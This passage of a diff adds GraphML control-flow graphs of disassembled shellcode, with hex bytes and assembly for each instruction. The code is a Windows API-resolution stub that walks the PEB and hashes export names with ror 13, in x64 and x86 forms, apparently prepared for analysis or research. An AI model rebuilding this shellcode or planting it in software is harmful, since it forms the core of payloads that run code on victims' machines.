+        <edge source="block.0x1036:instruction.0x103d" target="block.0x1036:instruction.0x1040"/>
+        <edge source="block.0x1036:instruction.0x1040" target="block.0x1036:instruction.0x1043"/>
+        <edge source="block.0x1036:instruction.0x1043" target="block.0x1036:instruction.0x1049"/>
+      </graph>
+    </node>
+    <node id="block.0x104b">
+      <data key="address">0x104b</data>
+      <data key="type">block</data>
+      <graph edgedefault="directed">
+        <data key="address">0x104b</data>
+        <data key="type">block</data>
+        <node id="block.0x104b:instruction.0x104b">
+          <data key="address">0x104b</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b8088000000</data>
+          <data key="instruction.source">mov eax, dword ptr [rax + 0x88]</data>
+        </node>
+        <node id="block.0x104b:instruction.0x1051">
+          <data key="address">0x1051</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4885c0</data>
+          <data key="instruction.source">test rax, rax</data>
+        </node>
+        <node id="block.0x104b:instruction.0x1054">
+          <data key="address">0x1054</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">7467</data>
+          <data key="instruction.source">je 0x10bd</data>
+        </node>
+        <edge source="block.0x104b:instruction.0x104b" target="block.0x104b:instruction.0x1051"/>
+        <edge source="block.0x104b:instruction.0x1051" target="block.0x104b:instruction.0x1054"/>
+      </graph>
+    </node>
+    <node id="block.0x1056">
+      <data key="address">0x1056</data>
+      <data key="type">block</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1056</data>
+        <data key="type">block</data>
+        <node id="block.0x1056:instruction.0x1056">
+          <data key="address">0x1056</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4801d0</data>
+          <data key="instruction.source">add rax, rdx</data>
+        </node>
+        <node id="block.0x1056:instruction.0x1059">
+          <data key="address">0x1059</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">50</data>
+          <data key="instruction.source">push rax</data>
+        </node>
+        <node id="block.0x1056:instruction.0x105a">
+          <data key="address">0x105a</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b4818</data>
+          <data key="instruction.source">mov ecx, dword ptr [rax + 0x18]</data>
+        </node>
+        <node id="block.0x1056:instruction.0x105d">
+          <data key="address">0x105d</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">448b4020</data>
+          <data key="instruction.source">mov r8d, dword ptr [rax + 0x20]</data>
+        </node>
+        <node id="block.0x1056:instruction.0x1061">
+          <data key="address">0x1061</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4901d0</data>
+          <data key="instruction.source">add r8, rdx</data>
+        </node>
+        <edge source="block.0x1056:instruction.0x1056" target="block.0x1056:instruction.0x1059"/>
+        <edge source="block.0x1056:instruction.0x1056" target="block.0x1056:instruction.0x105a"/>
+        <edge source="block.0x1056:instruction.0x1056" target="block.0x1056:instruction.0x105d"/>
+        <edge source="block.0x1056:instruction.0x105d" target="block.0x1056:instruction.0x1061"/>
+      </graph>
+    </node>
+    <node id="block.0x1064">
+      <data key="address">0x1064</data>
+      <data key="type">block</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1064</data>
+        <data key="type">block</data>
+        <node id="block.0x1064:instruction.0x1064">
+          <data key="address">0x1064</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">e356</data>
+          <data key="instruction.source">jrcxz 0x10bc</data>
+        </node>
+      </graph>
+    </node>
+    <node id="block.0x1066">
+      <data key="address">0x1066</data>
+      <data key="type">block</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1066</data>
+        <data key="type">block</data>
+        <node id="block.0x1066:instruction.0x1066">
+          <data key="address">0x1066</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">48ffc9</data>
+          <data key="instruction.source">dec rcx</data>
+        </node>
+        <node id="block.0x1066:instruction.0x1069">
+          <data key="address">0x1069</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">418b3488</data>
+          <data key="instruction.source">mov esi, dword ptr [r8 + rcx*4]</data>
+        </node>
+        <node id="block.0x1066:instruction.0x106d">
+          <data key="address">0x106d</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4801d6</data>
+          <data key="instruction.source">add rsi, rdx</data>
+        </node>
+        <node id="block.0x1066:instruction.0x1070">
+          <data key="address">0x1070</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4d31c9</data>
+          <data key="instruction.source">xor r9, r9</data>
+        </node>
+        <edge source="block.0x1066:instruction.0x1066" target="block.0x1066:instruction.0x106d"/>
+        <edge source="block.0x1066:instruction.0x1066" target="block.0x1066:instruction.0x1069"/>
+        <edge source="block.0x1066:instruction.0x1069" target="block.0x1066:instruction.0x106d"/>
+      </graph>
+    </node>
+    <node id="block.0x1073">
+      <data key="address">0x1073</data>
+      <data key="type">block</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1073</data>
+        <data key="type">block</data>
+        <node id="block.0x1073:instruction.0x1073">
+          <data key="address">0x1073</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4831c0</data>
+          <data key="instruction.source">xor rax, rax</data>
+        </node>
+        <node id="block.0x1073:instruction.0x1076">
+          <data key="address">0x1076</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">ac</data>
+          <data key="instruction.source">lodsb al, byte ptr [rsi]</data>
+        </node>
+        <node id="block.0x1073:instruction.0x1077">
+          <data key="address">0x1077</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">41c1c90d</data>
+          <data key="instruction.source">ror r9d, 0xd</data>
+        </node>
+        <node id="block.0x1073:instruction.0x107b">
+          <data key="address">0x107b</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4101c1</data>
+          <data key="instruction.source">add r9d, eax</data>
+        </node>
+        <node id="block.0x1073:instruction.0x107e">
+          <data key="address">0x107e</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">38e0</data>
+          <data key="instruction.source">cmp al, ah</data>
+        </node>
+        <node id="block.0x1073:instruction.0x1080">
+          <data key="address">0x1080</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">75f1</data>
+          <data key="instruction.source">jne 0x1073</data>
+        </node>
+        <edge source="block.0x1073:instruction.0x1073" target="block.0x1073:instruction.0x1076"/>
+        <edge source="block.0x1073:instruction.0x1073" target="block.0x1073:instruction.0x1077"/>
+        <edge source="block.0x1073:instruction.0x1073" target="block.0x1073:instruction.0x107e"/>
+        <edge source="block.0x1073:instruction.0x1076" target="block.0x1073:instruction.0x107b"/>
+        <edge source="block.0x1073:instruction.0x1076" target="block.0x1073:instruction.0x107e"/>
+        <edge source="block.0x1073:instruction.0x1077" target="block.0x1073:instruction.0x107b"/>
+        <edge source="block.0x1073:instruction.0x1077" target="block.0x1073:instruction.0x1080"/>
+        <edge source="block.0x1073:instruction.0x107b" target="block.0x1073:instruction.0x107e"/>
+        <edge source="block.0x1073:instruction.0x107e" target="block.0x1073:instruction.0x1080"/>
+      </graph>
+    </node>
+    <node id="block.0x1082">
+      <data key="address">0x1082</data>
+      <data key="type">block</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1082</data>
+        <data key="type">block</data>
+        <node id="block.0x1082:instruction.0x1082">
+          <data key="address">0x1082</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4c034c2408</data>
+          <data key="instruction.source">add r9, qword ptr [rsp + 8]</data>
+        </node>
+        <node id="block.0x1082:instruction.0x1087">
+          <data key="address">0x1087</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4539d1</data>
+          <data key="instruction.source">cmp r9d, r10d</data>
+        </node>
+        <node id="block.0x1082:instruction.0x108a">
+          <data key="address">0x108a</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">75d8</data>
+          <data key="instruction.source">jne 0x1064</data>
+        </node>
+        <edge source="block.0x1082:instruction.0x1082" target="block.0x1082:instruction.0x1087"/>
+        <edge source="block.0x1082:instruction.0x1087" target="block.0x1082:instruction.0x108a"/>
+      </graph>
+    </node>
+    <node id="block.0x108c">
+      <data key="address">0x108c</data>
+      <data key="type">block</data>
+      <graph edgedefault="directed">
+        <data key="address">0x108c</data>
+        <data key="type">block</data>
+        <node id="block.0x108c:instruction.0x108c">
+          <data key="address">0x108c</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">58</data>
+          <data key="instruction.source">pop rax</data>
+        </node>
+        <node id="block.0x108c:instruction.0x108d">
+          <data key="address">0x108d</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">448b4024</data>
+          <data key="instruction.source">mov r8d, dword ptr [rax + 0x24]</data>
+        </node>
+        <node id="block.0x108c:instruction.0x1091">
+          <data key="address">0x1091</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4901d0</data>
+          <data key="instruction.source">add r8, rdx</data>
+        </node>
+        <node id="block.0x108c:instruction.0x1094">
+          <data key="address">0x1094</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">66418b0c48</data>
+          <data key="instruction.source">mov cx, word ptr [r8 + rcx*2]</data>
+        </node>
+        <node id="block.0x108c:instruction.0x1099">
+          <data key="address">0x1099</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">448b401c</data>
+          <data key="instruction.source">mov r8d, dword ptr [rax + 0x1c]</data>
+        </node>
+        <node id="block.0x108c:instruction.0x109d">
+          <data key="address">0x109d</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4901d0</data>
+          <data key="instruction.source">add r8, rdx</data>
+        </node>
+        <node id="block.0x108c:instruction.0x10a0">
+          <data key="address">0x10a0</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">418b0488</data>
+          <data key="instruction.source">mov eax, dword ptr [r8 + rcx*4]</data>
+        </node>
+        <node id="block.0x108c:instruction.0x10a4">
+          <data key="address">0x10a4</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4801d0</data>
+          <data key="instruction.source">add rax, rdx</data>
+        </node>
+        <node id="block.0x108c:instruction.0x10a7">
+          <data key="address">0x10a7</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4158</data>
+          <data key="instruction.source">pop r8</data>
+        </node>
+        <node id="block.0x108c:instruction.0x10a9">
+          <data key="address">0x10a9</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4158</data>
+          <data key="instruction.source">pop r8</data>
+        </node>
+        <node id="block.0x108c:instruction.0x10ab">
+          <data key="address">0x10ab</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">5e</data>
+          <data key="instruction.source">pop rsi</data>
+        </node>
+        <node id="block.0x108c:instruction.0x10ac">
+          <data key="address">0x10ac</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">59</data>
+          <data key="instruction.source">pop rcx</data>
+        </node>
+        <node id="block.0x108c:instruction.0x10ad">
+          <data key="address">0x10ad</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">5a</data>
+          <data key="instruction.source">pop rdx</data>
+        </node>
+        <node id="block.0x108c:instruction.0x10ae">
+          <data key="address">0x10ae</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4158</data>
+          <data key="instruction.source">pop r8</data>
+        </node>
+        <node id="block.0x108c:instruction.0x10b0">
+          <data key="address">0x10b0</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4159</data>
+          <data key="instruction.source">pop r9</data>
+        </node>
+        <node id="block.0x108c:instruction.0x10b2">
+          <data key="address">0x10b2</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">415a</data>
+          <data key="instruction.source">pop r10</data>
+        </node>
+        <node id="block.0x108c:instruction.0x10b4">
+          <data key="address">0x10b4</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4883ec20</data>
+          <data key="instruction.source">sub rsp, 0x20</data>
+        </node>
+        <node id="block.0x108c:instruction.0x10b8">
+          <data key="address">0x10b8</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4152</data>
+          <data key="instruction.source">push r10</data>
+        </node>
+        <node id="block.0x108c:instruction.0x10ba">
+          <data key="address">0x10ba</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">ffe0</data>
+          <data key="instruction.source">jmp rax</data>
+        </node>
+        <edge source="block.0x108c:instruction.0x108c" target="block.0x108c:instruction.0x10a7"/>
+        <edge source="block.0x108c:instruction.0x108c" target="block.0x108c:instruction.0x108d"/>
+        <edge source="block.0x108c:instruction.0x108c" target="block.0x108c:instruction.0x1099"/>
+        <edge source="block.0x108c:instruction.0x108d" target="block.0x108c:instruction.0x10a0"/>
+        <edge source="block.0x108c:instruction.0x108d" target="block.0x108c:instruction.0x1091"/>
+        <edge source="block.0x108c:instruction.0x1091" target="block.0x108c:instruction.0x1099"/>
+        <edge source="block.0x108c:instruction.0x1091" target="block.0x108c:instruction.0x10ad"/>
+        <edge source="block.0x108c:instruction.0x1091" target="block.0x108c:instruction.0x1094"/>
+        <edge source="block.0x108c:instruction.0x1094" target="block.0x108c:instruction.0x10a0"/>
+        <edge source="block.0x108c:instruction.0x1094" target="block.0x108c:instruction.0x1099"/>
+        <edge source="block.0x108c:instruction.0x1094" target="block.0x108c:instruction.0x10ac"/>
+        <edge source="block.0x108c:instruction.0x1099" target="block.0x108c:instruction.0x10a0"/>
+        <edge source="block.0x108c:instruction.0x1099" target="block.0x108c:instruction.0x109d"/>
+        <edge source="block.0x108c:instruction.0x109d" target="block.0x108c:instruction.0x10a7"/>
+        <edge source="block.0x108c:instruction.0x109d" target="block.0x108c:instruction.0x10a0"/>
+        <edge source="block.0x108c:instruction.0x109d" target="block.0x108c:instruction.0x10ad"/>
+        <edge source="block.0x108c:instruction.0x10a0" target="block.0x108c:instruction.0x10a7"/>
+        <edge source="block.0x108c:instruction.0x10a0" target="block.0x108c:instruction.0x10ac"/>
+        <edge source="block.0x108c:instruction.0x10a0" target="block.0x108c:instruction.0x10a4"/>
+        <edge source="block.0x108c:instruction.0x10a4" target="block.0x108c:instruction.0x10ad"/>
+        <edge source="block.0x108c:instruction.0x10a4" target="block.0x108c:instruction.0x10ba"/>
+        <edge source="block.0x108c:instruction.0x10a7" target="block.0x108c:instruction.0x10a9"/>
+        <edge source="block.0x108c:instruction.0x10a9" target="block.0x108c:instruction.0x10ab"/>
+        <edge source="block.0x108c:instruction.0x10ab" target="block.0x108c:instruction.0x10ac"/>
+        <edge source="block.0x108c:instruction.0x10ac" target="block.0x108c:instruction.0x10ad"/>
+        <edge source="block.0x108c:instruction.0x10ad" target="block.0x108c:instruction.0x10ae"/>
+        <edge source="block.0x108c:instruction.0x10ae" target="block.0x108c:instruction.0x10b0"/>
+        <edge source="block.0x108c:instruction.0x10b0" target="block.0x108c:instruction.0x10b2"/>
+        <edge source="block.0x108c:instruction.0x10b2" target="block.0x108c:instruction.0x10b4"/>
+        <edge source="block.0x108c:instruction.0x10b2" target="block.0x108c:instruction.0x10b8"/>
+        <edge source="block.0x108c:instruction.0x10b4" target="block.0x108c:instruction.0x10b8"/>
+        <edge source="block.0x108c:instruction.0x10b8" target="block.0x108c:instruction.0x10ba"/>
+      </graph>
+    </node>
+    <node id="block.0x10bc">
+      <data key="address">0x10bc</data>
+      <data key="type">block</data>
+      <graph edgedefault="directed">
+        <data key="address">0x10bc</data>
+        <data key="type">block</data>
+        <node id="block.0x10bc:instruction.0x10bc">
+          <data key="address">0x10bc</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">58</data>
+          <data key="instruction.source">pop rax</data>
+        </node>
+      </graph>
+    </node>
+    <node id="block.0x10bd">
+      <data key="address">0x10bd</data>
+      <data key="type">block</data>
+      <graph edgedefault="directed">
+        <data key="address">0x10bd</data>
+        <data key="type">block</data>
+        <node id="block.0x10bd:instruction.0x10bd">
+          <data key="address">0x10bd</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4159</data>
+          <data key="instruction.source">pop r9</data>
+        </node>
+        <node id="block.0x10bd:instruction.0x10bf">
+          <data key="address">0x10bf</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">5a</data>
+          <data key="instruction.source">pop rdx</data>
+        </node>
+        <node id="block.0x10bd:instruction.0x10c0">
+          <data key="address">0x10c0</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">488b12</data>
+          <data key="instruction.source">mov rdx, qword ptr [rdx]</data>
+        </node>
+        <node id="block.0x10bd:instruction.0x10c3">
+          <data key="address">0x10c3</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">e94fffffff</data>
+          <data key="instruction.source">jmp 0x1017</data>
+        </node>
+        <edge source="block.0x10bd:instruction.0x10bd" target="block.0x10bd:instruction.0x10bf"/>
+        <edge source="block.0x10bd:instruction.0x10bf" target="block.0x10bd:instruction.0x10c0"/>
+        <edge source="block.0x10bd:instruction.0x10c0" target="block.0x10bd:instruction.0x10c3"/>
+      </graph>
+    </node>
+    <edge source="block.0x1000" target="block.0x1017"/>
+    <edge source="block.0x1017" target="block.0x1023"/>
+    <edge source="block.0x1023" target="block.0x102b"/>
+    <edge source="block.0x1023" target="block.0x102d"/>
+    <edge source="block.0x102b" target="block.0x102d"/>
+    <edge source="block.0x102d" target="block.0x1036"/>
+    <edge source="block.0x102d" target="block.0x1023"/>
+    <edge source="block.0x1036" target="block.0x104b"/>
+    <edge source="block.0x1036" target="block.0x10bd"/>
+    <edge source="block.0x104b" target="block.0x1056"/>
+    <edge source="block.0x104b" target="block.0x10bd"/>
+    <edge source="block.0x1056" target="block.0x1064"/>
+    <edge source="block.0x1064" target="block.0x1066"/>
+    <edge source="block.0x1064" target="block.0x10bc"/>
+    <edge source="block.0x1066" target="block.0x1073"/>
+    <edge source="block.0x1073" target="block.0x1073"/>
+    <edge source="block.0x1073" target="block.0x1082"/>
+    <edge source="block.0x1082" target="block.0x1064"/>
+    <edge source="block.0x1082" target="block.0x108c"/>
+    <edge source="block.0x10bc" target="block.0x10bd"/>
+    <edge source="block.0x10bd" target="block.0x1017"/>
+  </graph>
+</graphml>
@@ -0,0 +1,615 @@
+<?xml version="1.0" ?>
+<graphml xmlns="http://graphml.graphdrawing.org/xmlns" xmlns:xsi="http://graphml.graphdrawing.org/xmlns" xsi:schemaLocation="http://graphml.graphdrawing.org/xmlns http://graphml.graphdrawing.org/xmlns/1.0/graphml.xsd">
+  <key id="address" for="all" attr.name="address" attr.type="long"/>
+  <key id="type" for="all" attr.name="type" attr.type="string"/>
+  <key id="instruction.source" for="node" attr.name="instruction.source" attr.type="string"/>
+  <key id="instruction.hex" for="node" attr.name="instruction.hex" attr.type="string"/>
+  <graph edgedefault="directed">
+    <node id="block.0x1000">
+      <data key="address">0x1000</data>
+      <data key="type">block</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1000</data>
+        <data key="type">block</data>
+        <node id="block.0x1000:instruction.0x1000">
+          <data key="address">0x1000</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">60</data>
+          <data key="instruction.source">pushal</data>
+        </node>
+        <node id="block.0x1000:instruction.0x1001">
+          <data key="address">0x1001</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">89e5</data>
+          <data key="instruction.source">mov ebp, esp</data>
+        </node>
+        <node id="block.0x1000:instruction.0x1003">
+          <data key="address">0x1003</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">31d2</data>
+          <data key="instruction.source">xor edx, edx</data>
+        </node>
+        <node id="block.0x1000:instruction.0x1005">
+          <data key="address">0x1005</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">648b5230</data>
+          <data key="instruction.source">mov edx, dword ptr fs:[edx + 0x30]</data>
+        </node>
+        <node id="block.0x1000:instruction.0x1009">
+          <data key="address">0x1009</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b520c</data>
+          <data key="instruction.source">mov edx, dword ptr [edx + 0xc]</data>
+        </node>
+        <node id="block.0x1000:instruction.0x100c">
+          <data key="address">0x100c</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b5214</data>
+          <data key="instruction.source">mov edx, dword ptr [edx + 0x14]</data>
+        </node>
+        <edge source="block.0x1000:instruction.0x1000" target="block.0x1000:instruction.0x1003"/>
+        <edge source="block.0x1000:instruction.0x1000" target="block.0x1000:instruction.0x1001"/>
+        <edge source="block.0x1000:instruction.0x1003" target="block.0x1000:instruction.0x1005"/>
+        <edge source="block.0x1000:instruction.0x1005" target="block.0x1000:instruction.0x1009"/>
+        <edge source="block.0x1000:instruction.0x1009" target="block.0x1000:instruction.0x100c"/>
+      </graph>
+    </node>
+    <node id="block.0x100f">
+      <data key="address">0x100f</data>
+      <data key="type">block</data>
+      <graph edgedefault="directed">
+        <data key="address">0x100f</data>
+        <data key="type">block</data>
+        <node id="block.0x100f:instruction.0x100f">
+          <data key="address">0x100f</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b7228</data>
+          <data key="instruction.source">mov esi, dword ptr [edx + 0x28]</data>
+        </node>
+        <node id="block.0x100f:instruction.0x1012">
+          <data key="address">0x1012</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">0fb74a26</data>
+          <data key="instruction.source">movzx ecx, word ptr [edx + 0x26]</data>
+        </node>
+        <node id="block.0x100f:instruction.0x1016">
+          <data key="address">0x1016</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">31ff</data>
+          <data key="instruction.source">xor edi, edi</data>
+        </node>
+      </graph>
+    </node>
+    <node id="block.0x1018">
+      <data key="address">0x1018</data>
+      <data key="type">block</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1018</data>
+        <data key="type">block</data>
+        <node id="block.0x1018:instruction.0x1018">
+          <data key="address">0x1018</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">31c0</data>
+          <data key="instruction.source">xor eax, eax</data>
+        </node>
+        <node id="block.0x1018:instruction.0x101a">
+          <data key="address">0x101a</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">ac</data>
+          <data key="instruction.source">lodsb al, byte ptr [esi]</data>
+        </node>
+        <node id="block.0x1018:instruction.0x101b">
+          <data key="address">0x101b</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">3c61</data>
+          <data key="instruction.source">cmp al, 0x61</data>
+        </node>
+        <node id="block.0x1018:instruction.0x101d">
+          <data key="address">0x101d</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">7c02</data>
+          <data key="instruction.source">jl 0x1021</data>
+        </node>
+        <edge source="block.0x1018:instruction.0x1018" target="block.0x1018:instruction.0x101a"/>
+        <edge source="block.0x1018:instruction.0x101a" target="block.0x1018:instruction.0x101b"/>
+        <edge source="block.0x1018:instruction.0x101b" target="block.0x1018:instruction.0x101d"/>
+      </graph>
+    </node>
+    <node id="block.0x101f">
+      <data key="address">0x101f</data>
+      <data key="type">block</data>
+      <graph edgedefault="directed">
+        <data key="address">0x101f</data>
+        <data key="type">block</data>
+        <node id="block.0x101f:instruction.0x101f">
+          <data key="address">0x101f</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">2c20</data>
+          <data key="instruction.source">sub al, 0x20</data>
+        </node>
+      </graph>
+    </node>
+    <node id="block.0x1021">
+      <data key="address">0x1021</data>
+      <data key="type">block</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1021</data>
+        <data key="type">block</data>
+        <node id="block.0x1021:instruction.0x1021">
+          <data key="address">0x1021</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">c1cf0d</data>
+          <data key="instruction.source">ror edi, 0xd</data>
+        </node>
+        <node id="block.0x1021:instruction.0x1024">
+          <data key="address">0x1024</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">01c7</data>
+          <data key="instruction.source">add edi, eax</data>
+        </node>
+        <node id="block.0x1021:instruction.0x1026">
+          <data key="address">0x1026</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">49</data>
+          <data key="instruction.source">dec ecx</data>
+        </node>
+        <node id="block.0x1021:instruction.0x1027">
+          <data key="address">0x1027</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">75ef</data>
+          <data key="instruction.source">jne 0x1018</data>
+        </node>
+        <edge source="block.0x1021:instruction.0x1021" target="block.0x1021:instruction.0x1024"/>
+        <edge source="block.0x1021:instruction.0x1024" target="block.0x1021:instruction.0x1026"/>
+        <edge source="block.0x1021:instruction.0x1026" target="block.0x1021:instruction.0x1027"/>
+      </graph>
+    </node>
+    <node id="block.0x1029">
+      <data key="address">0x1029</data>
+      <data key="type">block</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1029</data>
+        <data key="type">block</data>
+        <node id="block.0x1029:instruction.0x1029">
+          <data key="address">0x1029</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">52</data>
+          <data key="instruction.source">push edx</data>
+        </node>
+        <node id="block.0x1029:instruction.0x102a">
+          <data key="address">0x102a</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">57</data>
+          <data key="instruction.source">push edi</data>
+        </node>
+        <node id="block.0x1029:instruction.0x102b">
+          <data key="address">0x102b</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b5210</data>
+          <data key="instruction.source">mov edx, dword ptr [edx + 0x10]</data>
+        </node>
+        <node id="block.0x1029:instruction.0x102e">
+          <data key="address">0x102e</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b423c</data>
+          <data key="instruction.source">mov eax, dword ptr [edx + 0x3c]</data>
+        </node>
+        <node id="block.0x1029:instruction.0x1031">
+          <data key="address">0x1031</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">01d0</data>
+          <data key="instruction.source">add eax, edx</data>
+        </node>
+        <node id="block.0x1029:instruction.0x1033">
+          <data key="address">0x1033</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b4078</data>
+          <data key="instruction.source">mov eax, dword ptr [eax + 0x78]</data>
+        </node>
+        <node id="block.0x1029:instruction.0x1036">
+          <data key="address">0x1036</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">85c0</data>
+          <data key="instruction.source">test eax, eax</data>
+        </node>
+        <node id="block.0x1029:instruction.0x1038">
+          <data key="address">0x1038</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">744c</data>
+          <data key="instruction.source">je 0x1086</data>
+        </node>
+        <edge source="block.0x1029:instruction.0x1029" target="block.0x1029:instruction.0x102a"/>
+        <edge source="block.0x1029:instruction.0x1029" target="block.0x1029:instruction.0x102b"/>
+        <edge source="block.0x1029:instruction.0x102a" target="block.0x1029:instruction.0x1038"/>
+        <edge source="block.0x1029:instruction.0x102b" target="block.0x1029:instruction.0x102e"/>
+        <edge source="block.0x1029:instruction.0x102b" target="block.0x1029:instruction.0x1031"/>
+        <edge source="block.0x1029:instruction.0x102e" target="block.0x1029:instruction.0x1031"/>
+        <edge source="block.0x1029:instruction.0x1031" target="block.0x1029:instruction.0x1033"/>
+        <edge source="block.0x1029:instruction.0x1033" target="block.0x1029:instruction.0x1036"/>
+        <edge source="block.0x1029:instruction.0x1036" target="block.0x1029:instruction.0x1038"/>
+      </graph>
+    </node>
+    <node id="block.0x103a">
+      <data key="address">0x103a</data>
+      <data key="type">block</data>
+      <graph edgedefault="directed">
+        <data key="address">0x103a</data>
+        <data key="type">block</data>
+        <node id="block.0x103a:instruction.0x103a">
+          <data key="address">0x103a</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">01d0</data>
+          <data key="instruction.source">add eax, edx</data>
+        </node>
+        <node id="block.0x103a:instruction.0x103c">
+          <data key="address">0x103c</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">50</data>
+          <data key="instruction.source">push eax</data>
+        </node>
+        <node id="block.0x103a:instruction.0x103d">
+          <data key="address">0x103d</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b4818</data>
+          <data key="instruction.source">mov ecx, dword ptr [eax + 0x18]</data>
+        </node>
+        <node id="block.0x103a:instruction.0x1040">
+          <data key="address">0x1040</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b5820</data>
+          <data key="instruction.source">mov ebx, dword ptr [eax + 0x20]</data>
+        </node>
+        <node id="block.0x103a:instruction.0x1043">
+          <data key="address">0x1043</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">01d3</data>
+          <data key="instruction.source">add ebx, edx</data>
+        </node>
+        <edge source="block.0x103a:instruction.0x103a" target="block.0x103a:instruction.0x103c"/>
+        <edge source="block.0x103a:instruction.0x103a" target="block.0x103a:instruction.0x103d"/>
+        <edge source="block.0x103a:instruction.0x103a" target="block.0x103a:instruction.0x1040"/>
+        <edge source="block.0x103a:instruction.0x1040" target="block.0x103a:instruction.0x1043"/>
+      </graph>
+    </node>
+    <node id="block.0x1045">
+      <data key="address">0x1045</data>
+      <data key="type">block</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1045</data>
+        <data key="type">block</data>
+        <node id="block.0x1045:instruction.0x1045">
+          <data key="address">0x1045</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">85c9</data>
+          <data key="instruction.source">test ecx, ecx</data>
+        </node>
+        <node id="block.0x1045:instruction.0x1047">
+          <data key="address">0x1047</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">743c</data>
+          <data key="instruction.source">je 0x1085</data>
+        </node>
+        <edge source="block.0x1045:instruction.0x1045" target="block.0x1045:instruction.0x1047"/>
+      </graph>
+    </node>
+    <node id="block.0x1049">
+      <data key="address">0x1049</data>
+      <data key="type">block</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1049</data>
+        <data key="type">block</data>
+        <node id="block.0x1049:instruction.0x1049">
+          <data key="address">0x1049</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">49</data>
+          <data key="instruction.source">dec ecx</data>
+        </node>
+        <node id="block.0x1049:instruction.0x104a">
+          <data key="address">0x104a</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b348b</data>
